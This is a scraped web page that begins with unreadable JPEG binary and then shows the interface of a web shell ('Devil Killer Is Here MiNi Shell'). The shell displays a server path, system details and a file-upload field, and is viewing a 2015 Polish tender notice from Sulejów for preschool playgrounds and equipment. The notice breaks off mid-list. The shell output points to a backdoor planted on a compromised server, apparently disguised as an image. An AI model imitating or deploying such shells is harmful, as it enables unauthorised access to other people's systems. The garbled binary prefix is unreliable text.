JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150918/245064-N-2015.html

<p class="kh_header"><b>Sulejów: Budowa placów zabaw wraz z doposażeniem oddziałów przedszkolnych przy szkołach podstawowych na terenie gminy Sulejów w ramach projektu Radosne maluchy - doposażenie oddziałów przedszkolnych na terenie gminy Sulejów</b><br>
<b>Numer ogłoszenia: 245064 - 2015; data zamieszczenia: 18.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulejów , ul. Konecka 42, 97-330 Sulejów, woj. łódzkie, tel. 44 6102500, faks 44 6162551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw wraz z doposażeniem oddziałów przedszkolnych przy szkołach podstawowych na terenie gminy Sulejów w ramach projektu Radosne maluchy - doposażenie oddziałów przedszkolnych na terenie gminy Sulejów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa pięciu placów zabaw dla oddziałów przedszkolnych przy szkołach podstawowych (Szkoła Podstawowa Nr 1 w Sulejowie, Szkoła Podstawowa Nr 2 w Sulejowie, Szkoła Podstawowa w Łęcznie, Szkoła Podstawowa w Uszczynie i Szkoła Podstawowa w Witowie) oraz zakup, dostawa i montaż zabawek, pomocy dydaktycznych, artykułów  plastycznych, sprzętu  komputerowego, multimedialnego oraz mebli i wyposażenia  do  sal, szatni, kuchni i toalet w ramach projektu Radosne maluchy - doposażenie oddziałów przedszkolnych na terenie gminy Sulejów współfinansowanego ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego  do 8 oddziałów  przedszkolnych  na terenie gminy Sulejów w:
 - Szkole Podstawowej Nr 1 w Sulejowie (2 oddziały),
- Szkole Podstawowej Nr 2 w Sulejowie,
- Szkole Podstawowej w Uszczynie
- Szkole Podstawowej w Łęcznie
- Szkole podstawowej w Witowie
- Szkole Podstawowej w Przygłowie ( 2 oddziały) 
Przedmiot zamówienia podzielony został na następujące pięć części zamówienia (zadania): 
Część I - BUDOWA PLACÓW ZABAW DLA ODDZIAŁÓW PRZEDSZKOLNYCH PRZY SZKOŁACH PODSTAWOWYCH
Część II - ZAKUP I DOSTAWA ARTYKUŁÓW  PLASTYCZNYCH, ZABAWEK I POMOCY DYDAKTYCZNYCH 
Część III - ZAKUP, DOSTAWA I MONTAŻ SPRZĘTU KOMPUTEROWEGO, MULTIMEDIALNEGO I AUDIOWIZUALNEGO 
Część IV - ZAKUP, DOSTAWA I MONTAŻ MEBLI  DO  SAL  I  SZATNI, WYPOSAŻENIA WYPOCZYNKOWEGO I WYPOSAŻENIA  ZAPEWNIAJĄCEGO BEZPIECZNE  WARUNKI OPIEKI NAD DZIEĆMI
Część V - ZAKUP, DOSTAWA I MONTAŻ WYPOSAŻENIA DO TOALET I  DO KUCHNI ORAZ ZAPEWNIAJĄCEGO UTRZYMANIE CZYSTOŚCI
Jeżeli  w opisach przedmiotu zamówienia podano nazwy własne nie mają one na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004 r., Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych Zamawiającego. 
Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełniania tego samego poziomu jakościowego, merytorycznego oraz gwarantujące taką samą funkcjonalność jak produkty opisane w przedmiocie zamówienia. Produkt równoważny to taki, który posiada te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż produkt wskazany produkt. Obowiązek udowodnienia równoważności ciąży na wykonawcy zgodnie z art. 30 ust. 5 ustawy Pzp. Wykonawca, który zastosował produkt równoważny ma obowiązek wskazać w swojej ofercie, jakie materiały lub urządzenia zostały zmienione i określić jakie materiały i urządzenia w ich miejsce proponuje podając ich parametry techniczne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9, 30.21.31.00-6, 39.16.00.00-1, 44.41.00.00-7, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu w części I Zamawiający wymaga wniesienia wadium w wysokości: 6.500,00 zł (słownie: sześć tysięcy pięćset złotych).
W części II, III, IV, V Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych) - wg wzoru załączonego do SIWZ - załącznik nr 1 do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W części I:
Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zamówienie na roboty budowlane, odpowiadające swoim rodzajem, którego przedmiotem była budowa placu zabaw o wartości nie mniejszej niż 50.000,00 zł/brutto, z załączeniem dowodów określających, czy robota ta została wykonane w sposób należyty oraz wskazujących, czy została wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona
W części II, III, IV, V:
Zamawiający uzna, że Wykonawca spełnia warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych) - wg wzoru załączonego do SIWZ - załącznik nr 1 do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych) - wg wzoru załączonego do SIWZ - załącznik nr 1 do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W części I:
Zamawiający uzna, że Wykonawca spełnia warunek jeżeli dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonywania zamówienia Zamawiający uzna dysponowanie osobami posiadającymi uprawnienia w zakresie kierownika budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno - budowlanej lub odpowiadającym im ważnym uprawnieniom budowlanym wydanym na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalnościach
W części II, III, IV, V:
Zamawiający uzna, że Wykonawca spełnia warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych) - wg wzoru załączonego do SIWZ - załącznik nr 1 do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych) - wg wzoru załączonego do SIWZ - załącznik nr 1 do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - z wykorzystaniem wzoru określonego w załączniku nr 8 do oferty, Zgodnie z § 1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. (Dz. U. z 2013 r. poz. 231) Zamawiający określa, iż wykonawca winien wykazać w wykazie wyłącznie wykonane roboty budowlane szczegółowo określone w pkt 1 ppkt. 2) Rozdział 3 SIWZ. Dowody wskazujące czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone winny dotyczyć robót budowlanych wymienionych w wykazie;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. opis przedmiotu zamówienia dotyczący części II (artykuły  plastyczne, zabawki  i pomoce dydaktyczne) wraz ze specyfikacją cenową artykułów - wg wzoru załączonego do SIWZ - załącznik nr 6.2. do oferty;
2. opis przedmiotu zamówienia dotyczący części III (sprzęt komputerowy, multimedialny i audiowizualny) wraz ze specyfikacją cenową artykułów - wg wzoru załączonego do SIWZ - załącznik nr 6.3. do oferty;
3. opis przedmiotu zamówienia dotyczący części IV (meble, wyposażenie wypoczynkowe i zapewniające bezpieczne warunki) wraz ze specyfikacją cenową artykułów - wg wzoru załączonego do SIWZ - załącznik nr 6.4. do oferty.
4. opis przedmiotu zamówienia dotyczący części V (wyposażenie toalet i kuchni oraz wyposażenie zapewniające utrzymanie czystości) wraz ze specyfikacją cenową artykułów - wg wzoru załączonego do SIWZ - załącznik nr 6.5. do oferty.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do występowania w imieniu wykonawcy w przypadku gdy dokumenty składające się na ofertę, podpisuje osoba nieuprawniona do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sulejow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sulejowie, ul. Konecka 42, 97-330 Sulejów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2015 godzina 09:00, miejsce: Urząd Miejski w Sulejowie, ul. Konecka 42, 97-330 Sulejów, Wejście A, I piętro, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej PO Kapitał Ludzki w ramach projektu Radosne maluchy - doposażenie oddziałów przedszkolnych na terenie gminy Sulejów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> BUDOWA PLACÓW ZABAW DLA ODDZIAŁÓW PRZEDSZKOLNYCH PRZY SZKOŁACH PODSTAWOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa placów zabaw dla oddziałów przedszkolnych przy Szkołach Podstawowych, w ramach zadania inwestycyjnego pod nazwą Radosne maluchy - doposażenie oddziałów przedszkolnych na terenie gminy Sulejów. 
W ramach budowy placów zabaw wybudować należy następujące place zabaw;
a) Plac zabaw przy Szkole Podstawowej nr 1 w Sulejowie, zawierający:
- zestaw zabawowy maxi- w skład zestawu zabawowego wchodzi: zjeżdżalnia metalowa, stopy stalowe, ocynkowane, wieża kwadratowa z daszkiem x4, zjeżdżalnia x2, koci grzbiet, wejście linowe, drabinka wejściowa, tunel linowy, most linowy, kładka linowa ścianka linowa, ścianka wspinaczkowa.
- strefę bezpieczną z nawierzchni piaskowej o powierzchni 100 m2 z bezpiecznym obrzeżem.
- tablicę z regulaminem korzystania z placu zabaw, tablica z instrukcją obsługi urządzeń znajdujących się na placu zabaw.
b) Plac zabaw przy Szkole Podstawowej nr 2 w Sulejowie, zawierający:
- zestaw zabawowy mini- w skład zestawu zabawowego wchodzi: wieża kwadratowa z daszkiem x2, wieża z siecią, tunel linowy, zjeżdżalnia, pomost belkowy, ścianka wspinaczkowa. 
- strefę bezpieczną wykonaną z nawierzchni piaskowej o powierzchni 64,00 m2 z bezpiecznym obrzeżem.
- tablicę z regulaminem korzystania z placu zabaw, tablica z instrukcją obsługi urządzeń znajdujących się na placu zabaw.
c) Plac zabaw przy Szkole Podstawowej w Łęcznie, zawierający:
- huśtawkę wagową na podstawie metalowej - 1 sztuka, składająca się z podstawy metalowej o wym. 3,0x044x1,10m, stal ocynkowana, malowana proszkowo, elementy drewniane bezrdzeniowe, impregnowane powierzchniowo lub z drewan klejonego warstwowo.
- bujaki sprężynowe - 3 sztuki. Bujaki o wymiarach max. 1,57x0,27x1,05 m. Elementy stalowe, malowane proszkowo. Korpus bujaka wykonany ze sklejki wodoodpornej, obustronnie malowany farbami akrylowymi, urządzenie mocowane na stałe do gruntu poprzez stalowa sprężynę 20 mm. Siedzisko wykonane z płyty HDPE. 
- strefę bezpieczną z nawierzchni piaskowej o powierzchni około 41,00 m2 z bezpiecznym obrzeżem.
- tablicę z regulaminem korzystania z placu zabaw, tablica z instrukcją obsługi urządzeń znajdujących się na placu zabaw.
d) Plac zabaw przy Szkole Podstawowej w Uszczynie, zawierający:
- zestaw zabawowy maxi - w skład zestawu zabawowego wchodzi: zjeżdżalnia metalowa, stopy stalowe, ocynkowane, wieża kwadratowa z daszkiem x4, zjeżdżalnia x2, koci grzbiet, wejście linowe, drabinka wejściowa, tunel linowy, most linowy, kładka linowa ścianka linowa, ścianka wspinaczkowa.
- strefę bezpieczną z nawierzchni piaskowej o powierzchni 100 m2 z bezpiecznym obrzeżem.
e) Plac zabaw przy Szkole Podstawowej w Witowie, zawierający:
